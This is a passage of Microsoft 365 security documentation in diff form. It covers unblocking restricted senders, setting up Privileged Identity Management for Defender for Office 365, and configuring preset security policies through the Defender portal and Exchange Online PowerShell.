--- **Send bulk email through on-premises email servers**: Customers maintain their own email infrastructure for mass mailings.-- **Use a third-party bulk email provider**: There are several third-party bulk email solution providers that you can use to send mass mailings. These companies have a vested interest in working with customers to ensure good email sending practices.-
- The Messaging, Mobile, Malware Anti-Abuse Working Group (MAAWG) publishes its membership roster at <https://www.maawg.org/about/roster>. Several bulk email providers are on the list, and are known to be responsible internet citizens.
security Outbound Spam Restore Restricted Users https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/outbound-spam-restore-restricted-users.md
- Title: Remove blocked users from the Restricted entities page
- - NOCSH
----
- - 'ms.exch.eac.ActionCenter.Restricted.Users.RestrictedUsers'
- - MET150
-
- - m365-security
- - tier2
-description: Admins can learn how to remove user accounts from the Restricted entities page in the Microsoft Defender portal. Users are added to the Restricted entities page for sending outbound spam, typically as a result of account compromise.
--- seo-marvel-apr2020- Previously updated : 11/2/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Remove blocked users from the Restricted entities page
--
-In Microsoft 365 organizations with mailboxes in Exchange Online or standalone Exchange Online Protection (EOP) organizations without Exchange Online mailboxes, several things happen if a user exceeds the [outbound sending limits of the service](/office365/servicedescriptions/exchange-online-service-description/exchange-online-limits#sending-limits-across-office-365-options) or the [limits in outbound spam policies](outbound-spam-policies-configure.md):
--- The user is restricted from sending email, but they can still receive email.-- The user is added to the **Restricted entities** page in the Microsoft Defender portal.-
- A _restricted entity_ is a **user account** or a **connector** that's blocked from sending email due to indications of compromise, which typically includes exceeding message receiving and sending limits.
--- If the user tries to send email, the message is returned in a non-delivery report (also known as an NDR or bounce message) with the error code [5.1.8](/Exchange/mail-flow-best-practices/non-delivery-reports-in-exchange-online/fix-error-code-5-1-8-in-exchange-online) and the following text:-
-> "Your message couldn't be delivered because you weren't recognized as a valid sender. The most common reason for this is that
-> your email address is suspected of sending spam and it's no longer allowed to send email. Contact your email admin for
-> assistance. Remote Server returned '550 5.1.8 Access denied, bad outbound sender."
-
-For more information about compromised user accounts and how to regain control of them, see [Responding to a compromised email account](responding-to-a-compromised-email-account.md).
-
-The procedures in this article explain how admins can remove user accounts from the **Restricted entities** page in the Microsoft Defender portal or in Exchange Online PowerShell.
-
-For more information about compromised _connectors_ and how to remove them from the **Restricted entities** page, see [Remove blocked connectors from the Restricted entities page](connectors-remove-blocked.md).
-
-## What do you need to know before you begin?
--- You open the Microsoft Defender portal at <https://security.microsoft.com>. To go directly to the **Restricted users** page, use <https://security.microsoft.com/restrictedusers>.--- To connect to Exchange Online PowerShell, see [Connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell).--- You need to be assigned permissions before you can do the procedures in this article. You have the following options:
- - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Core Security settings (manage)** or **Authorization and settings/Security settings/Core Security settings (read)**.
- - [Exchange Online permissions](/exchange/permissions-exo/permissions-exo):
- - _Remove user accounts from the Restricted entities page_: Membership in the **Organization Management** or **Security Administrator** role groups.
- - _Read-only access to the Restricted entities page_: Membership in the **Global Reader**, **Security Reader**, or **View-Only Organization Management** role groups.
- - [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership in the **Global Administrator**, **Security Administrator**, **Global Reader**, or **Security Reader** roles gives users the required permissions _and_ permissions for other features in Microsoft 365.
--- A sender exceeding the outbound email limits is an indicator of a compromised account. Before you follow the procedures in this article to remove a user from the **Restricted entities** page, be sure to follow the required steps to regain control of the account as described in [Responding to a compromised email account in Office 365](responding-to-a-compromised-email-account.md).-
-## Remove a user from the Restricted entities page in the Microsoft Defender portal
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Review** \> **Restricted entities**. Or, to go directly to the **Restricted entities** page, use <https://security.microsoft.com/restrictedentities>.
-
-2. On the **Restricted entities** page, identify the user account to unblock. The **Entity** value is **Mailbox**.
-
- Select a column header to sort by that column.
-
- To change the list of entities from normal to compact spacing, select :::image type="icon" source="../../media/m365-cc-sc-standard-icon.png" border="false"::: **Change list spacing to compact or normal**, and then select :::image type="icon" source="../../media/m365-cc-sc-compact-icon.png" border="false"::: **Compact list**.
-
- Use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and a corresponding value to find specific users.
-
-3. Select the user to unblock by selecting the check box for the entity, and then selecting the **Unblock** action that appears on the page.
-
-4. In the **Unblock user** flyout that opens, read the details about the restricted account on the **Overview** page. Verify that you've gone through the suggestions in the **Recommendations** section to confirm that the account isn't compromised or to regain control of the account.
-
- When you're finished on the **Overview** page, select **Next**.
-
-5. On the **Unblock user page**, consider the recommendations and use the links in the **Multi-factor authentication** and **Change password** sections to **Enable MFA** and **Reset the user's password** if you haven't done these steps already. Enabling MFA and resetting the password are a good defense against future account compromise.
-
- When you're finished on the **Unblock user page**, select **Submit**.
-
-6. Select **Yes** in the warning dialog that opens.
-
- > [!NOTE]
- > Under most circumstances, all restrictions should be removed from the user within one hour. Transient technical issues might cause a longer wait time, but the total wait should be no longer than 24 hours.
-
-## Verify the alert settings for restricted users
-
-The default alert policy named **User restricted from sending email** automatically notifies admins when users are blocked from sending email. For more information about alert policies, see [Alert policies in the Microsoft Defender portal](alert-policies-defender-portal.md).
-
-> [!IMPORTANT]
-> For alerts to work, audit logging must be turned on (it's on by default). To verify that audit logging is turned on or to turn it on, see [Turn auditing on or off](/purview/audit-log-enable-disable).
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Policies & rules** \> **Alert policy**. Or, to go directly to the **Alert policy** page, use <https://security.microsoft.com/alertpoliciesv2>.
-
-2. On the **Alert policy** page, find the alert named **User restricted from sending email**. You can sort the alerts by name, or use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box to find the alert.
-
- Select the **User restricted from sending email** alert by clicking anywhere in the row other than the check box next to the name.
-
-3. In the **User restricted from sending email** flyout that opens, verify or configure the following settings:
- - **Status**: Verify the alert is turned on :::image type="icon" source="../../media/scc-toggle-on.png" border="false":::.
- - Expand the **Set your recipients section** and verify the **Recipients** and **Daily notification limit** values.
-
- To change the values, select :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit recipient settings** in the section or select :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit policy** at the top of the flyout.
-
- - On the **Decide if you want to notify people when this alert is triggered** page of the wizard that opens, verify or change the following settings:
- - Verify **Opt-in for email notifications** is selected.
- - **Email recipients**: The default value is **TenantAdmins** (meaning, **Global Administrator** members). To add more recipients, click in the empty area of the box. A list of recipients appears, and you can start typing a name to filter and select a recipient. Remove an existing recipient from the box by selecting :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: next to their name.
- - **Daily notification limit**: The default value is **No limit**.
-
- When you're finished on the **Decide if you want to notify people when this alert is triggered** page, select **Next**.
-
- - On the **Review your settings** page, select **Submit**, and then select **Done**.
-
-4. Back in the ***User restricted from sending email** flyout, select :::image type="icon" source="../../media/m365-cc-sc-close-icon.png" border="false"::: at the top of the flyout.
-
-## Use Exchange Online PowerShell to view and remove users from the Restricted entities page
-
-To view this list of users that are restricted from sending email, run the following command in [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell):
-
-```powershell
-Get-BlockedSenderAddress
-```
-
-To view details about a specific user, replace \<emailaddress\> with their email address and run the following command:
-
-```powershell
-Get-BlockedSenderAddress -SenderAddress <emailaddress> | Format-List
-```
-
-For detailed syntax and parameter information, see [Get-BlockedSenderAddress](/powershell/module/exchange/get-blockedsenderaddress).
-
-To remove a user from the Restricted users list, replace \<emailaddress\> with their email address and run the following command:
-
-```powershell
-Remove-BlockedSenderAddress -SenderAddress <emailaddress>
-```
-
-For detailed syntax and parameter information, see [Remove-BlockedSenderAddress](/powershell/module/exchange/remove-blockedsenderaddress).
-
-## More information
--- [Responding to a compromised email account](responding-to-a-compromised-email-account.md)-- [Remove blocked connectors from the Restricted entities page](connectors-remove-blocked.md)
security Pim In Mdo Configure https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/pim-in-mdo-configure.md
- Title: Use Azure Privileged Identity Management (PIM) in Microsoft Defender for Office 365 to limit admin access to cyber security tools.
- - NOCSH
--- Previously updated : 2/20/2024-
- - MET150
-
- - m365-security
- - tier1
-
- - seo-marvel-apr2020
-description: Learn to integrate Azure PIM in order to grant just-in-time, time limited access to users to do elevated privilege tasks in Microsoft Defender for Office 365, lowering risk to your data.
---
-# Privileged Identity Management (PIM) and why to use it with Microsoft Defender for Office 365
-
-Privileged Identity Management (PIM) is an Azure feature that gives users access to data for a limited period of time (sometimes called a _time-boxed_ period of time). Access is given 'just-in-time' to take the required action, and then access is removed. PIM limits user access to sensitive data, which reduces risk as compared to traditional admin accounts with permanent access to data and other settings. So, how can we use this feature (PIM) with Microsoft Defender for Office 365?
-
-> [!TIP]
-> PIM access is scoped to the role and identity level to allow the completion of multiple tasks. In contrast, Privileged Access Management (PAM) is scoped at the task level.
-
-## Steps to use PIM to grant just-in-time access to Defender for Office 365 related tasks
-
-By setting up PIM to work with Microsoft Defender for Office 365, admins create a process for a user to _request and justify_ the elevated privileges that they need.
-
-This article uses the scenario for a user named Alex on the security team. We can elevate Alex's permissions for the following scenarios:
--- Permissions for normal day-to-day operations (for example, [Threat Hunting](threat-explorer-threat-hunting.md)).-- A temporary higher-level of privilege for less frequent, sensitive operations (for example, [remediating malicious delivered email](remediate-malicious-email-delivered-office-365.md)).-
-> [!TIP]
-> Although article includes specific steps for the scenario as described, you can do the same steps for other permissions. For example, when an information worker requires day-to-day access in eDiscovery to perform searches and case work, but occasionally needs the elevated permissions to export data from the organization.
-
-***Step 1***. In the Azure PIM console for your subscription, add the user (Alex) to the Azure Security Reader role and configure the security settings related to activation.
-
-1. Sign in to the [Microsoft Entra Admin Center](https://aad.portal.azure.com/) and select **Microsoft Entra ID** \> **Roles and administrators**.
-2. Select **Security Reader** in the list of roles and then **Settings** \> **Edit**
-3. Set the '**Activation maximum duration (hours)**' to a normal working day and 'On activation' to require **Azure MFA**.
-4. Because this is Alex's normal privilege level for day-to-day operations, Uncheck **Require justification on activation** \> **Update**.
-5. Select **Add Assignments** \> **No member selected** \> select or type the name to search for the correct member.
-6. Select the **Select** button to choose the member you need to add for PIM privileges \> select **Next** \> make no changes on the Add Assignment page (both assignment type _Eligible_ and duration _Permanently Eligible_ are defaults) and **Assign**.
-
-The name of the user (Alex in this scenario) appears under Eligible assignments on the next page. This result means they're able to PIM into the role with the settings configured earlier.
-
-> [!NOTE]
-> For a quick review of Privileged Identity Management see [this video](https://www.youtube.com/watch?v=VQMAg0sa_lE).
--
-***Step 2***. Create the required second (elevated) permission group for other tasks and assign eligibility.
-
-Using [Privileged Access groups](/entra/id-governance/privileged-identity-management/concept-pim-for-groups) we can now create our own custom groups and combine permissions or increase granularity where required to meet your organizational practices and needs.
-
-### Create a role or role group with the required permissions
-
-Use one of the following methods:
--- [Create an Email & collaboration role group in the Microsoft Defender portal](mdo-portal-permissions.md#create-email--collaboration-role-groups-in-the-microsoft-defender-portal):-
-Or
--- Create a custom role in Microsoft Defender XDR Unified role based access control (RBAC). For information and instructions, see [Start using Microsoft Defender XDR Unified RBAC model](../defender/manage-rbac.md#start-using-microsoft-defender-xdr-unified-rbac-model).-
-For either method:
--- Use a descriptive name (for example, 'Contoso Search and Purge PIM').-- Don't add members. Add the required permissions, save, and then go to the next step.-
-### Create the security group in Microsoft Entra ID for elevated permissions
-
-1. Browse back to the [Microsoft Entra Admin Center](https://aad.portal.azure.com/) and navigate to **Microsoft Entra ID** \> **Groups** \> **New Group**.
-2. Name your Microsoft Entra group to reflect its purpose, **no owners or members are required** right now.
-3. Turn **Microsoft Entra roles can be assigned to the group** to **Yes**.
-4. Don't add any roles, members, or owners, create the group.
-5. Go back into the group you created, and select **Privileged Identity Management** \> **Enable PIM**.
-6. Within the group, select **Eligible assignments** \> **Add assignments** \> Add the user who needs Search & Purge as a role of **Member**.
-7. Configure the **Settings** within the group's Privileged Access pane. Choose to **Edit** the settings for the role of **Member**.
-8. Change the activation time to suit your organization. This example requires _Microsoft Entra multifactor authentication_, _justification_, and _ticket information_ before selecting **Update**.
-
-### Nest the newly created security group into the role group
-
-> [!NOTE]
-> This step is required only if you used an Email & collaboration role group in [Create a role or role group with the required permissions](#create-a-role-or-role-group-with-the-required-permissions). Defender XDR Unified RBAC supports direct permissions assignments to Microsoft Entra groups, and you can add members to the group for PIM.
-
-1. [Connect to Security & Compliance PowerShell](/powershell/exchange/connect-to-scc-powershell) and run the following command:
-
- ```powershell
- Add-RoleGroupMember "<Role Group Name>" -Member "<Azure Security Group>"`
- ```
-
-## Test your configuration of PIM with Defender for Office 365
-
-1. Sign in with the test user (Alex), who should have no administrative access within the [Microsoft Defender portal](/microsoft-365/security/defender/overview-security-center) at this point.
-2. Navigate to PIM, where the user can activate their day-to-day security reader role.
-3. If you try to purge an email using Threat Explorer, you get an error stating you need more permissions.
-4. PIM a second time into the more elevated role, after a short delay you should now be able to purge emails without issue.
-
- :::image type="content" source="../../medio-add-the-search-and-purge-role-assignment-to-this-pim-role.PNG":::
-
-Permanent assignment of administrative roles and permissions doesn't align with the Zero Trust security initiative. Instead, you can use PIM to grant just-in-time access to the required tools.
-
-*Our thanks to Customer Engineer Ben Harris for access to the blog post and resources used for this content.*
security Preset Security Policies https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/preset-security-policies.md
- Title: Preset security policies
- - NOCSH
-----
- - m365-security
- - tier1
-
-description: Admins can learn how to apply Standard and Strict policy settings across the protection features of Exchange Online Protection (EOP) and Microsoft Defender for Office 365
- Previously updated : 11/2/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Preset security policies in EOP and Microsoft Defender for Office 365
--
-_Preset security policies_ allow you to apply protection features to users based on our recommended settings. Unlike custom policies that are infinitely configurable, virtually all of the settings in preset security policies aren't configurable, and are based on our observations in the datacenters. The settings in preset security policies provide a balance between keeping harmful content away from users while avoiding unnecessary disruptions.
-
-Depending on your organization, preset security policies provide many of the protection features that are available in [Exchange Online Protection (EOP)](eop-about.md) and [Microsoft Defender for Office 365](mdo-about.md).
-
-The following preset security policies are available:
--- **Standard** preset security policy-- **Strict** preset security policy-- **Built-in protection** preset security policy (default policies for Safe Attachments and Safe Links protection in Defender for Office 365)-
-For details about these preset security policies, see the [Appendix](#appendix) section at the end of this article.
-
-The rest of this article how to configure preset security policies.
-
-## What do you need to know before you begin?
--- You open the Microsoft Defender portal at <https://security.microsoft.com>. To go directly to the **Preset security policies** page, use <https://security.microsoft.com/presetSecurityPolicies>.--- To connect to Exchange Online PowerShell, see [Connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell).--- You need to be assigned permissions before you can do the procedures in this article. You have the following options:
- - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Core Security settings (manage)** or **Authorization and settings/Security settings/Core Security settings (read)**.
- - [Exchange Online permissions](/exchange/permissions-exo/permissions-exo):
- - _Configure preset security policies_: Membership in the **Organization Management** or **Security Administrator** role groups.
- - _Read-only access to preset security policies_: Membership in the **Global Reader** role group.
- - [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership in the **Global Administrator**, **Security Administrator**, or **Global Reader** roles gives users the required permissions _and_ permissions for other features in Microsoft 365.
-
-## Use the Microsoft Defender portal to assign Standard and Strict preset security policies to users
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & Collaboration** \> **Policies & Rules** \> **Threat policies** \> **Preset Security Policies** in the **Templated policies** section. Or, to go directly to the **Preset security policies** page, use <https://security.microsoft.com/presetSecurityPolicies>.
-
-2. If this is your first time on the **Preset security policies** page, it's likely that **Standard protection** and **Strict protection** are turned off :::image type="icon" source="../../media/scc-toggle-off.png" border="false":::.
-
- Slide the toggle of the one you want to configure to :::image type="icon" source="../../media/scc-toggle-on.png" border="false":::, and then select **Manage protection settings** to start the configuration wizard.
-
-3. On the **Apply Exchange Online Protection** page, identify the internal recipients that the [EOP protections](#policies-in-preset-security-policies) apply to (recipient conditions):
-
- - **All recipients**
-
- - **Specific recipients**: Configure one of the following recipient conditions that appear:
- - **Users**: The specified mailboxes, mail users, or mail contacts.
- - **Groups**:
- - Members of the specified distribution groups or mail-enabled security groups (dynamic distribution groups aren't supported).
- - The specified Microsoft 365 Groups.
- - **Domains**: All recipients in the organization with a primary email address in the specified [accepted domain](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains).
-
- Click in the appropriate box, start typing a value, and select the value that you want from the results. Repeat this process as many times as necessary. To remove an existing value, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: next to the value.
-
- For users or groups, you can use most identifiers (name, display name, alias, email address, account name, etc.), but the corresponding display name is shown in the results. For users or groups, enter an asterisk (\*) by itself to see all available values.
-
- You can use a condition only once, but the condition can contain multiple values:
-
- - Multiple **values** of the **same condition** use OR logic (for example, _\<recipient1\>_ or _\<recipient2\>_). If the recipient matches **any** of the specified values, the policy is applied to them.
- - Different **types of conditions** use AND logic. The recipient must match **all** of the specified conditions for the policy to apply to them. For example, you configure a condition with the following values:
- - Users: `romain@contoso.com`
- - Groups: Executives
-
- The policy is applied to `romain@contoso.com` _only_ if he's also a member of the Executives group. Otherwise, the policy isn't applied to him.
-
- - **None**
-
- - **Exclude these recipients**: If you selected **All recipients** or **Specific recipients**, select this option to configure recipient exceptions.
-
- You can use an exception only once, but the exception can contain multiple values:
-
- - Multiple **values** of the **same exception** use OR logic (for example, _\<recipient1\>_ or _\<recipient2\>_). If the recipient matches **any** of the specified values, the policy isn't applied to them.
- - Different **types of exceptions** use OR logic (for example, _\<recipient1\>_ or _\<member of group1\>_ or _\<member of domain1\>_). If the recipient matches **any** of the specified exception values, the policy isn't applied to them.
-
- When you're finished on the **Apply Exchange Online Protection** page, select **Next**.
-
- > [!NOTE]
- > In organizations without Defender for Office 365, selecting **Next** takes you to the **Review** page (Step 9).
-
-4. On the **Apply Defender for Office 365 protection** page, identify the internal recipients that the [Defender for Office 365 protections](#policies-in-preset-security-policies) apply to (recipient conditions).
-
- The settings and behavior are exactly like the **Apply Exchange Online Protection** page in the previous step.
-
- You can also select **Previously selected recipients** to use the same recipients that you selected for EOP protection on the previous page.
-
- When you're finished on the **Apply Defender for Office 365 protection** page, select **Next**.
-
-5. On the **Impersonation protection** page, select **Next**.
-
-6. On the **Add email addresses to flag when impersonated by attackers** page, add internal and external senders who are protected by [user impersonation protection](anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365).
-
- > [!NOTE]
- > All recipients automatically receive impersonation protection from [mailbox intelligence](anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365) in preset security policies.
- >
- > You can specify a maximum of 350 users for user impersonation protection in the Standard or Strict preset security policy.
- >
- > User impersonation protection doesn't work if the sender and recipient have previously communicated via email. If the sender and recipient have never communicated via email, the message can be identified as an impersonation attempt.
-
- Each entry consists of a display name and an email address:
-
- - **Internal users**: Click in the **Add a valid email** box or start typing the user's email address. Select the email address in the **Suggested contacts** dropdown list that appears. The user's display name is added to the **Add a name** box (which you can change). When you're finished selecting the user, select **Add**.
-
- - **External users**: Type the external user's full email address in the **Add a valid email** box, and then select the email address in the **Suggested contacts** dropdown list that appears. The email address is also added in the **Add a name** box (which you can change to a display name).
-
- Repeat these steps as many times as necessary.
-
- The users you added are listed on the page by **Display name** and **Sender email address**. To remove a user, select :::image type="icon" source="../../media/m365-cc-sc-close-icon.png" border="false"::: next to the entry.
-
- Use the :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Search** box to find entries on the page.
-
- When you're finished on the **Apply Defender for Office 365 protection** page, select **Next**.
-
-7. On the **Add domains to flag when impersonated by attackers** page, add internal and external domains that are protected by [domain impersonation protection](anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365).
-
- > [!NOTE]
- > All domains that you own ([accepted domains](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains)) automatically receive domain impersonation protection in preset security policies.
- >
- > You can specify a maximum of 50 custom domains for domain impersonation protection in the Standard or Strict preset security policy.
-
- Click in the **Add domains** box, enter a domain value, press the ENTER key or select the value that's displayed below the box. To remove a domain from the box and start over, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: next to the domain. When you're ready to add the domain, select **Add**. Repeat this step as many times as necessary.
-
- The domains you added are listed on the page. To remove the domain, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: next to the value.
-
- The domains you added are listed on the page. To remove a domain, select :::image type="icon" source="../../media/m365-cc-sc-close-icon.png" border="false"::: next to the entry.
-
- To remove an existing entry from the list, select :::image type="icon" source="../../media/m365-cc-sc-remove-icon.png" border="false"::: next to the entry.
-
- When you're finished on the **Add domains to flag when impersonated by attackers**, select **Next**.
-
-8. On the **Add trusted email addresses and domains to not flag as impersonation** page, enter the sender email addresses and domains that you to exclude from impersonation protection. Messages from these senders are never flagged as an impersonation attack, but the senders are still subject to scanning by other filters in EOP and Defender for Office 365.
-
- > [!NOTE]
- > Trusted domain entries don't include subdomains of the specified domain. You need to add an entry for each subdomain.
-
- Enter the email address or domain in the box, and then press the ENTER key or select the value that's displayed below the box. To remove a value from the box and start over, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: next to the value. When you're ready to add the user or domain, select **Add**. Repeat this step as many times as necessary.
-
- The users and domains you added are listed on the page by **Name** and **Type**. To remove an entry, select :::image type="icon" source="../../media/m365-cc-sc-close-icon.png" border="false"::: next to the entry.
-
- When you're finished on the **Add trusted email addresses and domains to not flag as impersonation** page, select **Next**.
-
-9. On the **Review and confirm your changes** page, review your settings. You can select **Back** or the specific page in the wizard to modify the settings.
-
- When you're finished on the **Review and confirm your changes** page, select **Confirm**.
-
-10. On the **Standard protection updated** or **Strict protection updated** page, select **Done**.
-
-## Use the Microsoft Defender portal to modify the assignments of Standard and Strict preset security policies
-
-The steps to modify the assignment of the **Standard protection** or **Strict protection** preset security policy are the same as when you initially [assigned the preset security policies to users](#use-the-microsoft-defender-portal-to-assign-standard-and-strict-preset-security-policies-to-users).
-
-To disable the **Standard protection** or **Strict protection** preset security policies while still preserving the existing conditions and exceptions, slide the toggle to :::image type="icon" source="../../media/scc-toggle-off.png" border="false":::. To enable the policies, slide the toggle to :::image type="icon" source="../../media/scc-toggle-on.png" border="false":::.
-
-## Use the Microsoft Defender portal to add exclusions to the Built-in protection preset security policy
-
-> [!TIP]
-> The **Built-in protection** preset security policy is applied to all users in organizations with any amount of licenses for Defender for Microsoft 365. This application is in the spirit of securing the broadest set of users until admins specifically configure Defender for Office 365 protections. Because **Built-in protection** is enabled by default, customers don't need to worry about violating product licensing terms. However, we recommend purchasing enough Defender for Office 365 licenses to ensure **Built-in protection** continues for all users.
->
-> The **Built-in protection** preset security policy doesn't affect recipients who are defined in the **Standard** or **Strict** preset security policies, or in custom Safe Links or Safe Attachments policies. Therefore, we typically don't recommend exceptions to the **Built-in protection** preset security policy.
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & Collaboration** \> **Policies & Rules** \> **Threat policies** \> **Preset Security Policies** in the **Templated policies** section. Or, to go directly to the **Preset security policies** page, use <https://security.microsoft.com/presetSecurityPolicies>.
-
-2. On the **Preset security policies** page, select **Add exclusions (not recommended)** in the **Built-in protection** section.
-
-3. In the **Exclude from Built-in protection** flyout that opens, identify the internal recipients that are excluded from the built-in Safe Links and Safe Attachments protection:
- - **Users**
- - **Groups**:
- - Members of the specified distribution groups or mail-enabled security groups (dynamic distribution groups aren't supported).
- - The specified Microsoft 365 Groups.
- - **Domains**
-
- Click in the appropriate box, start typing a value, and then select the value that's displayed below the box. Repeat this process as many times as necessary. To remove an existing value, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: next to the value.
-
- For users or groups, you can use most identifiers (name, display name, alias, email address, account name, etc.), but the corresponding display name is shown in the results. For users, enter an asterisk (\*) by itself to see all available values.
-
- You can use an exception only once, but the exception can contain multiple values:
-
- - Multiple **values** of the **same exception** use OR logic (for example, _\<recipient1\>_ or _\<recipient2\>_). If the recipient matches **any** of the specified values, the policy isn't applied to them.
- - Different **types of exceptions** use OR logic (for example, _\<recipient1\>_ or _\<member of group1\>_ or _\<member of domain1\>_). If the recipient matches **any** of the specified exception values, the policy isn't applied to them.
-
-4. When you're finished in the **Exclude from Built-in protection** flyout, select **Save**.
-
-## How do you know these procedures worked?
-
-To verify that you've successfully assigned the **Standard protection** or **Strict protection** security policy to a user, use a protection setting where the default value is different than the **Standard protection** setting, which is different that the **Strict protection** setting.
-
-For example, for email that's detected as spam (not high confidence spam) verify that the message is delivered to the Junk Email folder for **Standard protection** users, and quarantined for **Strict protection** users.
-
-Or, for [bulk mail](anti-spam-bulk-complaint-level-bcl-about.md), verify that the BCL value 6 or higher delivers the message to the Junk Email folder for **Standard protection** users, and the BCL value 5 or higher quarantines the message for **Strict protection** users.
-
-## Preset security policies in Exchange Online PowerShell
-
-In PowerShell, preset security policies consist of the following elements:
--- **Individual security policies**: For example, anti-malware policies, anti-spam policies, anti-phishing policies, Safe Links policies, and Safe Attachments policies. These policies are visible using the standard policy management cmdlets in [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell):
- - <u>EOP policies</u>:
- - **[Get-AntiPhishPolicy](/powershell/module/exchange/get-antiphishpolicy)**
- - **[Get-HostedContentFilterPolicy](/powershell/module/exchange/get-hostedcontentfilterpolicy)** (anti-spam policies)
- - **[Get-MalwareFilterPolicy](/powershell/module/exchange/get-malwarefilterpolicy)**
- - <u>Defender for Office 365 policies</u>:
- - **[Get-SafeAttachmentPolicy](/powershell/module/exchange/get-safeattachmentpolicy)**
- - **[Get-SafeLinksPolicy](/powershell/module/exchange/get-safelinkspolicy)**
-
- > [!WARNING]
- > Do not attempt to create, modify, or remove the individual security policies that are associated with preset security policies. The only supported method for creating the individual security policies for Standard or Strict preset security policies is to turn on the preset security policy in the Microsoft Defender portal for the first time.
--- **Rules**: Separate rules are used for the Standard preset security policy, the Strict preset security policy, and the Built-in protection preset security policy. The rules define the recipient conditions and exceptions for the policies (who the policies apply to). You manage these rules using the following cmdlets in [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell):
- - <u>Rules for Exchange Online Protection (EOP) protections</u>:
- - **[Disable-EOPProtectionPolicyRule](/powershell/module/exchange/disable-eopprotectionpolicyrule)**
- - **[Enable-EOPProtectionPolicyRule](/powershell/module/exchange/enable-eopprotectionpolicyrule)**
- - **[Get-EOPProtectionPolicyRule](/powershell/module/exchange/get-eopprotectionpolicyrule)**
- - **[New-EOPProtectionPolicyRule](/powershell/module/exchange/new-eopprotectionpolicyrule)**
- - **[Set-EOPProtectionPolicyRule](/powershell/module/exchange/set-eopprotectionpolicyrule)**
- - <u>Rules for Defender for Office 365 protections</u>:
- - **[Disable-ATPProtectionPolicyRule](/powershell/module/exchange/disable-atpprotectionpolicyrule)**
- - **[Enable-ATPProtectionPolicyRule](/powershell/module/exchange/enable-atpprotectionpolicyrule)**
- - **[Get-ATPProtectionPolicyRule](/powershell/module/exchange/get-atpprotectionpolicyrule)**
- - **[New-ATPProtectionPolicyRule](/powershell/module/exchange/new-atpprotectionpolicyrule)**
- - **[Set-ATPProtectionPolicyRule](/powershell/module/exchange/set-atpprotectionpolicyrule)**
- - <u>The rule for the Build-in protection preset security policy</u>:
- - **[Get-ATPBuiltInProtectionRule](/powershell/module/exchange/get-atpbuiltinprotectionrule)**
- - **[New-ATPBuiltInProtectionRule](/powershell/module/exchange/new-atpbuiltinprotectionrule)**
- - **[Set-ATPBuiltInProtectionRule](/powershell/module/exchange/set-atpbuiltinprotectionrule)**
-
- For the Standard and Strict preset security policies, these rules are created the first time you turn on the preset security policy in the Microsoft Defender portal. If you never turned on the preset security policy, the associated rules don't exist. Turning off the preset security policy doesn't delete the associated rules.
-
-The following sections describe how to use these cmdlets in **supported scenarios**.
-
-To connect to Exchange Online PowerShell, see [Connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell).
-
-### Use PowerShell to view individual security policies for preset security policies
-
-Remember, if you never turned on the Standard preset security policy or the Strict preset security policy in the Microsoft Defender portal, the associated security policies for the preset security policy don't exist.
